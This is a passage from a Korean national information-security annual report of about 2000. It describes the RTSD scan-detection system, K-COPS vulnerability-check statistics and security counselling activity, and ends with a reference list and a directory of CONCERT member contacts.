과이러한탐지시스템으로부터의결과값을분석하고실시간으로공격에대응하는검색탐지관리시스템 (Real Time Scan Detector Manager)" 으로구성된다. RTSD Agent는하나의네트워크또는서브네트워크에하나씩설치되어각각의네트워크를감시하여공격을탐지하고, RTSD Manager는전체네트워크를감시하며, 탐지된공격에자동대응하는기능을갖는다

135 ( 그림 4-4) 전체시스템개요 (1) 네트워크취약점검색공격탐지알고리즘본시스템에서사용하는탐지알고리즘은 한호스트에서일정시간간격으로일정한수의연결요청이있을경우이를취약점검색공격으로탐지 한다. 호스트기반의취약점검색탐지기법에서는포트를대상으로하지만여기서는단지소스 IP 주소만을대상으로하여네트워크기반의탐지시스템에적합하도록설계한다. 이는대부분의취약점검색공격이짧은시간안에하나의소스 IP로부터다수의연결요청을보낸다는특징을이용한것으로다수의취약점을검색하는대규모네트워크검색공격을포함하여개별취약점을검색하는공격을탐지하기에적합하다. 알고리즘의단순성으로인하여거짓탐지율이높아질수는있으나이는부가적인탐지모듈추가및사용자환경설정으로일정수준으로줄일수가있으며알고리즘의복잡도가낮아시스템부하및패킷손실이적어효율적인방법이라할수있다. 또한이러한단순성은새로이발견된취약점을검색하는공격을탐지할수있는유연성을제공한다. (2) 시스템구현 가 ) 실시간검색탐지시스템 (RTSD Agent) RTSD Agent는로컬네트워크상의모든패킷을읽어필요한정보만을수집하는패킷캡쳐모듈과네트워크취약점검색공격을탐지하는탐지모듈, 그리고탐지결과를기록하고관리자에게메일이나핸드폰으로연락하는로그및경고모듈로구성된다

136 패킷캡쳐모듈은 Tcpdump 등많은패킷모니터링도구에서사용하는 libpcap 라이브러리를사용한다. libpcap은시스템독립적이며사용자레벨의인터페이스를제공하기때문에여러기종의유닉스시스템에이식하기에편리하다. libpcap이수집한패킷중에서 TCP 패킷을필터링하고그중연결요청패킷인 SYN 패킷을필터링하여 TCP로연결요청하는패킷만을수집한다. 탐지모듈은앞서설명한탐지알고리즘을구현한모듈이다. 패킷갭쳐모듈에서수집한패킷에대하여 하나의소스 IP에서일정시간 (TIME-DELAY_THRESHOLD) 간격으로일정한수 (SCAN-COUNT-THRESHOLD) 만큼의연결요청이발생하는가를탐지 한다. 소스 IP 주소를저장하고검색하기위한자료구조는열러진접속및포트를검색하는데널리쓰이고있는해쉬테이블 (hash table) 을사용한다. 그리고 IP 검색시간을빠르게하기위하여해쉬충돌 (haush collision) 의수를제한한다. 로그및경고모듈은탐지모듈이탐지한네트워크검색공격정보를기록하고자동으로 RTSD Manager 및관리자에게메일을보내고핸드폰을호출하는기능을구현한다. 그리고다량의로그로인하여디스크를고갈시킬수있는서비스거부공격에대비하여하나의공격에대한로그수를제한한다. 나 ) 실시간검색탐지관리시스템 (RTSD Manager) RTSD Manager는 RTSD Agent로부터메일을수신하여처리하는메일처리모듈, 공격사이트의네트워크관리자연락처및관련 CERT 연락처를검색하는공격대응모듈, 그리고공격대응모듈에서검색한정보를관리자에게경고해주고, 기록하고, 통계보고서를만들며, 자동공격대응메일을발송해주는경고및보고모듈로구성된다. 공격대응모듈은 arin.net, whois.apnic.net, whois.krnic.net 등에서제공하는 whois 서비스를이용하여공격사이트의연락처정보와지역정보를알아내고, CERT 연락처 DB에서관련 CERT 연락처정보를조회한다. 그리고공격정보와함께공격대응메일을생성하여경고모듈로보낸다

137 ( 그림 4-5) RTSD Agen/RTSD Manager 구성도 다. RTSD 운영현황각기관에서스캔공격을자동보고하도록설정하여 RTSD를사용하면, 스캔공격정보가 CERTCC-KR에보고되고, CERTCC-KR에서는이정보를바탕으로최근에사용되는공격기법과어디서공격시도를많이하는지등의정보를분석하여해킹사고를사전에예방할수있다. 또한아직공개되지않은새로운보안취약점에대한스캔공격을탐지할수있어해킹사고예방효과를가져올수있다. 그리고 RTSD를설치한사용자들은이와같은정보를통하여최근에사용되는해킹방법을사전에차단함으로서해킹사고를방지할수있다. 다음표는 Y2K 기간동안 RTSD에의한해킹시도현황이다. 현재홈페이지를통하여 300 여기관에서다운로드해갔으며, 30여기관에서 RTSD를사용하고있으며, 구중 20여개기관에서스캔탐지시 CERTCC-KR로보고를하고있다. 공격기관별로분류해보면미국 (10), 국내 (7), 영국 (4), 독일 (3) 순으로미국으로부터의스캔공격이가장많이탐지되고있으며, 국내사이트의경우경유지로사용되고있을가능성이있어따로연락을취하여조치하고있다. 대부분의공격자들은 ISP업체의사용자이며, 기관일경우해당기관이해킹당한후경유지로사용되고있는경우가많다. 그리고국내에서국의사이트로공격한경우도 1건이탐지되었다. 피해기관별로분류해보면기업 (19), 연구소 (14) 순으로스캔공격을많이당하고있으며, 기업의경우대부분중소규모의사업자로웹호스팅또는메일서비스업체인경우가많다

138 스캔공격유형별로분류해보면최근 RPC 관련취약점에대한스캔공격이가장많이탐지되고있으며, DNS에대한단일취약점스캔공격이많은것으로보아 DNS 관련새로운취약점이나또는해킹도구가있는것으로추측된다 [ 표 4-5] RTSD 스캔공격탐지현황

139 2. K-COPS( 해킹취약점점검서비스 ) 현황 가. K-COPS 개요새천년연도전환시점전후에예상되는 Trinoo, TFN 등의대규모서비스거부공격과해커들의해킹취약점파악시도등을사전에예방하고, 한국정보보호센터에서배포된실시간스캔공격탐지 S/W(RTSD) 와연계한해킹대상을위한 1999년 12월 20일부터국내정보통신망이용기관을대상으로실시한해킹취약점점검서비스 (K-COPS, KISA-Computer Online Protection Service) 는 2000년 1월 15일까지 184개기관에온라인무료서비스를제공하여 747개해킹취약점이발견되어해당기관에점검결과와보완대책을통보하였다. [ 표 4-6] 기관별 K-COPS 신청건수 K-COPS를통해제공한서비스내용은최근에해킹사고의많은원인이되고있는주요보안문제점을원격에서점검하여점검결과및보안대책 통보하였다. ( 그림 4-6) K-COPS 화면

1 시스템의네트워크포트취약점 2 RPC를이용한버퍼오버플로우공격 3 CGI 보안취약점 4 PC 윈도우시스템의백오리피스설치여부 5 NFS 보안취약점및 X11 보안취약점 6 Trin00, TFN 등대규모서비스거부공격도구설치여부 7 기타보안취약점 나. K-COPS 결과분석 K-COPS를통해신청한기관을살펴보면, 민간기업 104개, 대학 55개로전체 86.

140 1 시스템의네트워크포트취약점 2 RPC를이용한버퍼오버플로우공격 3 CGI 보안취약점 4 PC 윈도우시스템의백오리피스설치여부 5 NFS 보안취약점및 X11 보안취약점 6 Trin00, TFN 등대규모서비스거부공격도구설치여부 7 기타보안취약점 나. K-COPS 결과분석 K-COPS를통해신청한기관을살펴보면, 민간기업 104개, 대학 55개로전체 86.5% 를차지하였고, 그밖에비영리 3개, 연구소 2개, 개인 1개그리고지역등기타 19개기관에서 K-COPS를신청하여서비스를받았다. 신청기관중민간업체대부분은침입차단시스템 (Firewall) 등해킹방지보안도구를설치하지않은소규모중소기업들이서비스를제공받았다. ( 그림 4-7) K-COPS 기관별신청현황 신청기간별현황을살펴보면 Y2K 대비 24시간비상대응기간인지난 12월 29일부터 1월 3일까지전체신청건수 162건의 58% 인 94건이접수되어처리되었다. 이는언론을통한 Y2K관련해킹예방을위한한국정보보호센터 K-COPS 홍보및 Y2K관련해킹위험에대한조급한대응과홍보에따른인지로인해 1주일동안집중적으로서비스신청을받았다

( 그림 4-8) 발견된취약점별비율 특히최근의해킹공격의대부분을차지하고있는버퍼오버플로우취약점은해커가원격지에서쉽게관리자권한을획득하여시스템에치명적인영향을줄수있어위험한해킹공격으로총취약점건수의 47.

141 [ 표 4-7] 신청기간별서비스현황 신청한기관들의해킹취약점발견건수를살펴보면, 버퍼오버플로우취약점 352건, Sendmail 취약점 110건, 대규모서비스거부공격를받을수있는취약점인 Trin00/TFN 102건, CGI 취약점 85건, Finger 취약점 59건, NFS 취약점 22건, 백오리피스 14건등총 747건이발견되었다. ( 그림 4-8) 발견된취약점별비율 특히최근의해킹공격의대부분을차지하고있는버퍼오버플로우취약점은해커가원격지에서쉽게관리자권한을획득하여시스템에치명적인영향을줄수있어위험한해킹공격으로총취약점건수의 47.1% 를차지했고, 지난해 8월국내모대학의네트워크를일시마비시킨대규모집중서비스거부공격인 Trin00/TFN 설치가능성이보인경우는대학등교육기관에서발견된취약점 298건중 21% 인 63건이발견되어전체취약점 378 건중 8.2% 인 31건이발견된민간기업에비해 2배이상많은것으로나타나, Trin00 등대규모서비스거부공격의피해가예상된다

142 [ 표 4-8] 취약점점검건수 그리고신청기관별해킹취약점발견건수를살펴보면민간기업 378건, 교육기관 298건, 지역등기타 40건등이발견되었고, 최근네트워크와시스템을마비및혼란시킬수있는 Trin00 흔적이있는취약점은대학등교육기관 63건민간기업이발견되었다. [ 표 4-9] 신청기관별취약점점검건수

143 제 5 장정보보호상담및기술봉사반활동현황

144 제 5 장정보보호상담및기술봉사반활동현황 제 1 절개요최근인터넷등정보통신망을통한위협은날로증가하고있고, 이에대한보안대책이절실히요구되고있는실정이다. 그러나정보시스템을안전운영해야할관리실무자들은보안대책에대한전문적인지식부족, 실질적인대응조치부족으로체계적인보안대책의필요성을인식하고있으나제대로추진하고있지못한실정이다. 한국정보보호센터는지난 '96년부터 정보보호기술봉사반 을구성하여국내공공기관들을대상으로안전진단과네트워크의보안대책등을현장지원하였다. 또한공공기관뿐아니라기업, 연구원, 교수등일반국민들도정보보호추진상의애로점이나관련기술개발, 연구등에대해서생기는의문점을해소하고올바른정보보호인식과추진방향을제시하기위하여정보보호기술뿐아니라정보보호정책및제도등을포함한 정보보호상담실 을 '97년한국정보보호센터홈페이지내개설하여주로온라인으로상담을실시하고있다. 많은공공기관에서각조직의특수성과시스템및네트워크의운영목적에따라다양한자문을요청하였고, 한국정보보호센터에서는기본적으로국가기관의보안관리실무지침에의거기술지원과현장자문을실시하였다. 그리고온라인으로서비스하고있는정보보호상담실을통한대국민대상으로정보보호관련궁금점을해소할수있도록노력하였다. 2000년부터는보다체계적인알찬정보보호관련정보서비스를위해기존의정보보호기술봉사반활동을확대한정보보호기술자문상담사업을추진하고, 정보보호상담실운영을알차게운영할예정이다

145 제 2 절정보보호상담실활동 1. 정보보호상담실목적국내사용자의정보보호관련제반질의사항에대한효율적인지원을위해문의사항접수및대의지원창구의단일화ㆍ지원업무의자동화등을통하여한국정보보호센터의홈페이지내에 '97년 12월 6일자로 정보보호상담실 을개설함으로써대국민정보보호서비스를제공함에있다. 2. 정보보호상담분야 가. 정보통신망정보보호기술분야정보통신망보안대책수립, 정보시스템보안취약성평가, 최근정보보호기술동향등정보보호관련기술에관한내용의문의사항에대해지원을하고있다. 나. 침해사고대응및기술교육분야정보시스템해킹사고처리및방지대책, 바이러스사고처리및방지대책등의정보통신망침해사고대응기술지원과정보보호입문과정ㆍ실무자과정ㆍ전문과정등의정보보호기술교육지원을하고있다. 다. 암호및응용분야전자상거래보안, 암호알고리즘등정보보호기반기술및암호응용기술관련제반사항에대한문의를접수및처리하고있다. 라. 정보보호시스템평가및표준화분야침입차단시스템을포함한정보보호시스템평가기준및평가제도시행, 전자서명ㆍ해쉬알고리즘등정보보호핵심기술표준화관련제반사항에대한문의를접수및처리하고있다

146 마. 정보보호정책분야개인정보보호법, 전자서명법등의정보보호관련일반법ㆍ제도및정보보호기술관련법ㆍ제도에관한제반사항에대하여문의를접수및처리하고있다. 바. 전자상거래및인증검증키에대한인증, 전자서명인증기술과기타전자서명인증과관련된제반사항에대하여문의를접수및처리하고있다. 사. 기타분야정보보호기술플라자를통한정보보호산업육성지원, 정보보호관련컨설팅, 전자상거래보안및인중분야등의정보보호관련기타모든제반사항에대한문의를접수및처리하고있다. 3. '99년도정보보호상담현황 '99년한해동안정보보호상담실을통해접수된문의는총 246개기관으로부터 265건이접수되었다. '97년 12월부터 '98년 12월까지 112개기관으로부터 138건이접수된것에비하면문의가약 2배가량증가한것이다. 이는정보화가가속화되면서일반국민들이정보보호에대한필요성을인식하고있으며, 궁금증을해소하기위하여정보보호상담실을많이이용하고있는것으로분석된다. 가. 정보보호상담실현황 (1) 월별상담현황 '99년한해동안의상담실적을살펴보면다음 [ 표 5-1] 과같다

147 [ 표 5-1] 월별상담현황 ( 그림 5-1) 월별상담실적변화 연초에는 10여건의정보보호관련문의가들어왔으나정보보호에대한관심의증가로인해상담은꾸준히늘어나매달 2~30여건의상담이들어왔다. 나. 정보보호분야별상담현황정보통신망보안기술, 해킹및바이러스, 암호및암호응용등다양한분야에서의문의가접수되었는데각분야별상담현황은다음 [ 표 5-2] 와같다

148 [ 표 5-2] 정보보호분야별상담현황 침해사고대응및교육관련한문의가 '99년한해동안 131건이접수되어일반인들이해킹이나바이러스등에대해서가장궁금해하고있는것으로나타났다. 이는지난 4월의 CIH 바이러스등에의해국내컴퓨터시스템이엄청난피해를입었으며, '99년한해동안 572건의해킹사고가 CERTCC-KR에접수되는등해킹사고의증가로인해해킹및바이러스에대한문의가많은것으로나타났다. '97년 12월이후부터 '99년 12월까지접수된상담내용을분야별로분류하여보면역시침해사고대응및교육분야가 181건으로전체문의건수의절반가까운 44.4% 인것으로나타났다. 그외에암호및암호응용분야에대한문의가 68건 (16.7%), 정보보호제품평가및표준에관한문의가 65건 (15.9%), 정보통신망보안기술에관한문의가 49건 (12.0%) 접수되었다. 정보보호의여러분야에대한관심사항의변화를알아보기위해서전년대비문의사항의변화를살펴보면가장많은문의건수가증가한분야가전자상거래및인증분야로 183.3% 의증가를보이고있다. 이는전자서명법 ( 법률제5792호 ) 이 '99년 7월 1일부터시행되면서전자서명및전자서명검증키관련한문의가증가하고있기때문으로분석된다. 침해사고대응및교육관련문의또한 162.0% 가증가하여여전히이분야에대한궁금증이많이접수되고있다

149 그외에정보보호정책분야가 114.3%, 암호및응용분야가 72.0%, 정보보호평가및표준분야가 97.%, 정보통신망보안기술분야가 4.2% 의문의건수증가를보이고있다. 이증가율을분석해볼때전자상거래및인증, 침해사고대응등일반국민들이실제생활에서부딪치는정보보호관련분야에대한문의는증가하고있는반면정보통신망보안기술분야등이론적인정보보호에대한문의는상대적으로줄어들고있다고보인다. 그만큼일반국민들도실생활에서정보보호와관련한의문사항들을많이접하고있는것같다. 다. 기관별정보보호상담현황정부기관, 공공기관, 교육기관, 일반기업, 기타등기관별로정보보호관련상담현황은다음 [ 표 5-3] 과같다. [ 표 5-3] 기관별정보보호상담현황 '99년한해동안일반기업으로부터접수된문의가 112건으로가장많았으며, 교육기관이 85건, 공공기관 26건, 정부기관 23건그리고개인등기타 19건이접수되었다

150 일반기업과교육기관으로부터의문의가전체의 75.4% 를차지하고있어많은과반수이상을차지하고있으며정부ㆍ공공기관으로부터의문의도증가하고있는경향을볼수있다. ( 그림 5-2) 기관별상담비율

151 제 3 절기술봉사반활동현황분석 1. 개요국내공공기관들은일반기업과마찬가지로자체 LAN을구성하여내부정보시스템간의통신뿐만아니라인터넷등외부네트워크와의연동으로활발한정보교환이가능해지고있다. 그러나이러한공공기관네트워크의변화는의부사용자의불법적인침입시도나내부사용자의부당한정보자원접근등각종정보통신망위협을증가시키고있으며이러한위협을고려하지않고구축한정보화사업은추가비용부담과안전운영관리에문제점을보이고있는실정이다. 특히최근정보범죄는침입자들이호기심차원의시스템침입에서심각한자료유출, 파괴등의보다범죄적인양상으로발전하고있어더욱대비책이요구된다. 하지만이러한정보통신망위협에서자신의정보시스템을안전하게관리해야만하는책임을지고있는관리실무자들은보안대책에대한전문적인지식부족과관련정보, 대의협조등이미흡하여항상해커등불법외부침입에대한우려를가지고있으며실질적인대응조치의필요성을인식하고있으나제대로추진하고있지못한실정이다. 이러한배경에따라 '96년부터한국정보보호센터에서는 정보보호기술봉사반 을구성하여국내공공기관을대상으로보안안전진단과네트워크의보안대책등을현장지원하고있다. 2. 활동분야 '96년부터 '99년까지많은공공기관에서각조직의특수성과시스템및네트워크의운영목적에따라다양한자문을요청하였으며, 이를분류해보면다음과같이나눌수있다

152 - 외부네트워크에서의불법침입에대한보안대책 - 내부사용자의부당한행위를방지하기위한보안대책 - 월드와이드웹서비스및 EDI 서비스등을위한보안대책 - 침입차단시스템등보안 SW 설치및운영에대한방안 - 정보시스템해킹등보안취약성안전진단분석방안이러한문의사항에대하여기본적으로국가기관의보안관리실무지침에의거기술지원과현장자문을실시하였으며, 세부기술에대해서는한국정보보호센터에서연구된기술과기술개발결과물인시큐어닥터및온라인시큐어닥터등을활용, 보급, 점검지원함으로써공공기관의실질적인정보보호수준을제고할수있도록하였다. 특히, 정보보호기술자문의요청에있어 '98년에는목적이뚜렷하지않은주로 무엇을 이라는방식의요청이많이들어온반면, '99년에들어와서는 어떻게 라는식의자문요청이증가하였다. 이는각기관들이정보보호에대한인식및배경지식을가지고좀더구체적인사항에대한자문을구한다는사실을보여준다 년도활동현황 가. 기술자문및지원ㅇ 18개기관 27회지원

153 [ 표 5-4] 1999 기술자문활동현황 방문일자자문기관지원내용 1.25 정부기관정보보호기술자문및취약점점검 1.26 정부기관정보보호기술자문및취약점점검 2.1 정부기관정보보호기술자문및취약점점검 2.22 공공기관정보보호기술자문및취약점점검 3.6 공공기관정보보호기술자문및취약점점검 3.12 교육기관시스템안전진단 S/W 교육 3.23 금융기관시스템보안도구설치및운영 4.2 정부기관정보보호기술지원 5.2 민간기관정보보호기술자문및취약점점검 5.6 교육기관시스템안전진단 S/W 교육 7.19 금융기관정보보호기술자문및취약점점검 7.31 정부기관정보보호기술자문및취약점점검 8.6 정부기관정보보호기술자문및취약점점검 8.13 교육기관정보보호기술자문지원 8.26 교육기관정보보호기술지원 8.28 정부기관정보보호기술자문및취약점점검 9.9 정부기관정보보호기술자문및취약점점검 9.10 정부기관정보보호기술자문및취약점점검 9.13 정부기관정보보호기술자문및취약점점검 9.14 정부기관정보보호기술지원 9.22 정부기관정보보호기술자문및취약점점검 정부기관시스템보안도구설치및운영 금융기관 네트워크구성상의취약점검토 / 인터넷연동시스템의보안취약점점검 11.5 공공기관 시스템보안도구설치및운영방법라우터를이용한접근제어지원 11.9 금융기관 시스템안전진단및취약점점검 공공기관정보보호기술자문및취약점점검 금융기관정보보호기술자문및취약점점검

154 4. 활동결과분석기술자문지원활동은온사이트에서실시하는시스템내부의잘못된설정을점검하는시스템보안점검, 네트워크를통하여침입이가능한네트워크취약점점검, 그리고네트워크구성도의분석을통한네트워크구성취약점으로구분할수있다. ㅇ시스템보안도구 - Secure DR 및공개용보안도구활용ㅇ네트워크취약점분석 - On-line Secure DR., ISS, Cyber Cops, sscan, mscan 등활용ㅇ네트워크구성취약점지원 - 라우터접근제어기법 - 네트워크장비를활용한네트워크분리기법최근에는상위의서비스이외에도정보시스템의인터넷연동에따른전반적인보안에대한종합적인컨설팅과정보보호센터와같은신뢰성이있는공식기관의정식보안점검등의서비스에대한요구가많아지고있다. 특히정보보호정책및보안조직구성지원등의정책적인면에서의도움을요구한다. 따라서향후에는정보시스템의안전운영에대한표준및지침을바탕으로각조직의보안정책수립, 보안조직의구성, 그리고기술적인내용을포함하는포괄적인정보보호컨설팅으로발전시킬필요성이대두되고있다

155 참고문헌

156 참고문헌 [1] 한국정보보호센터, 98 정보시스템해킹현황및대응, [2] 한국정보보호센터, 국내ㆍ외정보보호산업현황, [3] 한국정보보호센터, 정보통신망안전운영기술지침서, [4] 한국정보보호센터, 정보시스템침해사고방지기술개발최종보고서, [5] 한국정보보호센터, 99 해킹방지워크샵자료집, [6] 한국정보보호센터, 1차 CONCERT 기술세미나자료집, [7] 한국정보보호센터, 2차 CONCERT 기술세미나자료집, [8] 한국정보보호센터, 3차 CONCERT 기술세미나자료집, [9] 한국정보보호센터, 4차 CONCERT 기술세미나자료집, [10] 한국정보보호센터, 5차 CONCERT 기술세미나자료집, [11] Simson Garfinkel and Gene Spafford "Practical Unix & Internet Security" O'Reilly & Associates, Inc. [12] CIRCULAR NO. A-130, Management of Federal Information Resources, Accompanying Federal Register Materials - Feb.1996 [13] IETF RFC1244, "Site Security Handbook" [14] Danny Smith, "Forming an Incident Response Team", Austalian Computer Emergency Response Team, c/- Prentice Centre, The University of Queensland [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27]

157 [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44]

158 부록 부록 A. CONCERT 회원기관및연락처부록 B. FIRSTㆍAPSIRC 회원기관및연락처부록 C. 바이러스대응기관연락처부록 D. 한국정보보호산업협회회원사목록부록 E. 국내외정보보호관련 URL 목록부록 F. 정보보호관련공개 SW 현황부록 G. 운영체제별 99년도보안취약점및패치 URL 목록부록 H. 99 해킹방지기술권고문현황부록 I. 99 바이러스예보및경보현황부록 J. 99 정보보호관련기술이전현황부록 K. 해킹및바이러스언론보도

159 부록 A. CONCERT 회원기관및연락처 A1. 운영위원회 A2. 일반회원 A3. 개인회원

160 부록 A. CONCERT 회원기관및연락처 A1. 운영위원회김병천교수 (KAIST) 회원구분 : 위원장주소 : ( 우 ) 대전광역시유성구구성동 전화 : (042) 팩스 : 전자우편 : bckim@cais.kaist.ac.kr U R L : 권석철대표이사 ( 하우리 ) 주소 : ( 우 ) 서울시동작구대방동 49-6 유한양행 B/D 8층전화 : 팩스 : 전자우편 : sckwon@hauri.co.kr U R L : 김대환대표이사 ( 소만사 ) 주소 : ( 우 ) 서울특별시송파구신천동 2905 송파벤처타운 804호전화 : 팩스 : 전자우편 : kdh@somansa.co.kr U R L : 김은경실장 ( 서울대학교 ) 주소 : ( 우 ) 서울특별시관악구신림동산56-1 전화 : 팩스 : 전자우편 : egkim@erccwl.snu.ac.kr U R L : 남상훈과장 (SK Telecom) 주소 : ( 우 ) 서울특별시관악구봉천1동 전화 : 팩스 : 전자우편 : swnam@sktelecom.com U R L :

161 노시영팀장 ( 삼성 SDS) 주소 : ( 우 ) 서울특별시강남구역삼동 ( 일옥빌딩 20층 ) 전화 : 팩스 : 전자우편 : secnsy@samsung.co.kr U R L : 박천용선임연구원 ( 항공우주연구소 ) 주소 : ( 우 ) 대전광역시유성구어은동 5번지전화 : 팩스 : 전자우편 : cypark@kari.re.kr U R L : 박태완이사 ( 에스큐브 ) 주소 : ( 우 ) 서울시동작구신대방동 한국컴퓨터빌딩 705호전화 : 팩스 : 전자우편 : twpark@scube.co.kr U R L : 박형우선임연구원 (ETRI) 주소 : ( 우 ) 대전광역시유성구가정동 161 전화 : 팩스 : 전자우편 : hwpark@garam.kreonet.re.kr U R L : 백규태팀장 ( 한국통신 ) 주소 : ( 우 ) 서울특별시서초구우면동 17번지전화 : 팩스 : 전자우편 : baegt@kt.co.kr U R L : 백석철부장 ( 한국정보인증 ( 주 )) 전화 : 전자우편 : scbaek@hotmail.com 서광윤대리 ( 아시아나항공 ) 주소 : ( 우 ) 서울특별시강서구오쇠동 47번지아시아나타운시스템기술팀

162 전화 : 팩스 : 전자우편 : kyseo@asiana.co.kr U R L : 신명호주임연구원 ( 멀티미디어교육지원센터 ) 주소 : ( 우 ) 서울특별시서초우체국사서함 269호담당자 : 신명호전화 : 팩스 : 전자우편 : skyshin@edunet.nmc.nm.kr U R L : 심영철교수 ( 흥익대학교 ) 전화 : U R L : 심재규대리 ( 제일씨앤씨 ) 주소 : ( 우 ) 서울특별시중구남대문로 5가 500번지제일제당전화 : 팩스 : 전자우편 : cc653sjk@cheiljedang.com U R L : 오경수부장 ( 에스원 ) 주소 : ( 우 ) 서울시중구을지로1가삼성화재빌딩 9층전화 : 팩스 : 전자우편 : kenney@samsung.co.kr U R L : 오영희실장 ( 포항공대 ) 주소 : ( 우 ) 경북포항시효자동산 31번지전화 : 팩스 : 전자우편 : rhee@postech.ac.kr U R L : 오익균부장 ( 청와대비서실 ) 주소 : ( 우 ) 서울시종로구세종로 1번지전화 :

163 팩스 : 전자우편 : ikoh@cwd.go.kr U R L : 유황빈교수 ( 광운대학교 ) 주소 : ( 우 ) 서울시노원구월계동 전화 : 팩스 : 전자우편 : ryou@cs.kwangwoon.ac.kr U R L : netlab.kwangwoon.ac.kr 임환선임연구원 (KIST) 주소 : ( 우 ) 서울시성북구하월곡동 39-1 전화 : 팩스 : 전자우편 : hwanlim@kist.re.kr U R L : 정진욱교수 ( 성균관대학교 ) 주소 : ( 우 ) 경기도수원시장안구천천동 300번지전화 : 팩스 : 전자우편 : jwchung@yurim.skku.ac.kr U R L : 최동근차장 (LG-EDS) 주소 : ( 우 ) 서울특별시영등포구여의도동 20번지 (LG 트윈타워동관 10층 ) 전화 : 팩스 : 전자우편 : dkchoi@lgeds.lg.co.kr U R L : 홍승창이사 ( 데이터게이트 ) 주소 : ( 우 ) 서울특별시영등포구여의도동 35-3 ( 교원공제회관빌딩 8층 ) 전화 : 팩스 : 전자우편 : simon@datagate.co.kr U R L : 황규대대표이사 ( 대정아이앤씨 ) 주소 : ( 우 ) 서울특별시영등포구여의도동 25-2 ( 경호빌딩 6층 )

164 전화 : 팩스 : 전자우편 : mmuger@djic.co.kr U R L : 황혜선선임연구원 ( 한국원자력연구소 ) 주소 : ( 우 ) 대전광역시유성구대덕연구단지사서함105호전화 : 팩스 : 전자우편 : hhs@nanum.kaeri.re.kr U R L :

165 A2. 일반회원 1. 학교강원대학교담당부서 : 전자계산소전산망실주소 : ( 우 ) 강원도춘천시효자2동 강원대학교전자계산소전산망실미래관 501호담당자 : ( 정 ) 홍철, ( 부 ) 김재한전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chhong@cc.kangwon.ac.kr, jaehan@cc.kangwon.ac.kr U R L : 경남정보대학담당부서 : 정보통신센터담당자 : ( 정 ) 김민식, ( 부 ) 김숙회전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : mskim@1engjung.kit.ac.kr, shkim@nengjung.kit.ac.kr U R L : 경북대학교담당부서 : 전자계산소시스템관리팀주소 : ( 우 ) 대구시북구산격3동 1370번지담당자 : ( 정 ) 손중권, ( 부 ) 김현상, 이수경전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : khs@bh.kyungpook.ac.kr,leesk@bh.kyungpook.ac.kr U R L : 광주과학기술원담당부서 : 전자계산소주소 : ( 우 ) 광주광역시광산구쌍암동 572 담당자 : ( 정 ) 이규대, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kskim@eunhasu.kjist.ac.kr. U R L :

166 대구보건대학담당부서 : 학술정보운영팀주소 : ( 우 ) 대구광역시북구태전동산7번지담당자 : ( 정 ) 이재도, ( 부 ) 이윤구전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : leejd@ yglee@ U R L : 대덕대학담당부서 : 전자계산소주소 : ( 우 ) 대전광역시유성구장동 48 담당자 : ( 정 ) 김형민, ( 부 ) 민보현전화 : ( 정 ) , ( 부 ) 전자우편 : hmkim@nuil.ddc.ac.kr, bhmin@mail.ddc.ac.kr U R L : 대전대학교담당부서 : 전산지원센터주소 : ( 우 ) 대전광역시동구용운동 96-3 담당자 : ( 정 ) 이찬도, ( 부 ) 강병규전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cdlee@dragon.taejon.ac.kr, bgkang@dragon.taejon.ac.kr U R L : 덕성여자대학교담당부서 : 전산실주소 : ( 우 ) 서울시도봉구쌍문동 419 담당자 : ( 정 ) 정원호, ( 부 ) 이소연전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : whchng@center.duksung.ac.kr, syrhee@center.duksung.ac.kr U R L : 동국대학교담당부서 : 정보관리처주소 : ( 우 ) 서울중구필동 3가 26번지담당자 : ( 정 ) 엄기현, ( 부 ) 문상국전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 )

167 전자우편 : khum@cakm.dongguk.ac.kr, moon01@cakra.dongguk.ac.kr U R L : 부산교육대학교담당부서 : 컴퓨터교육학과 ( 분산시스템보안지원팀 ) 주소 : ( 우 ) 부산광역시연제구거제1동 263 담당자 : ( 정 ) 김현배, ( 부 ) 이병태전화 : ( 정 )(051) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : hbkim@ns.pusan-e.ac.kr, btlee@ns.pusan-e.ac.kr UR L : 부산대학교담당부서 : 전산망실주소 : ( 우 ) 부산시금정구장전동산30번지담당자 : ( 정 ) 이정태, ( 부 ) 차성환전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jtlee@hyowon.pusan.ac.kr, shcha@hyowon.pusan.ac.kr U R L : 서강대학교담당부서 : 정보통신원네트워크주소 : ( 우 ) 서울시마포구신수동 1번지담당자 : ( 정 ) 김추곤, ( 부 ) 최승국전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chugkim@ccs.sogang.ac.kr, skchoi@ccs.sogang.ac.kr U R L : 서울교육대학교담당부서 : 전자계산소주소 : ( 우 ) 서울시서초구서초동 1650 담당자 : ( 정 ) 배영부, ( 부 ) 김명신전화 : ( 정 ) , ( 부 ) 전자우편 : yujin@ns.seoul-e.ac.kr U R L : 서울대학교담당부서 : 중앙교육연구전산원주소 : ( 우 ) 서울특별시관악구신림동산

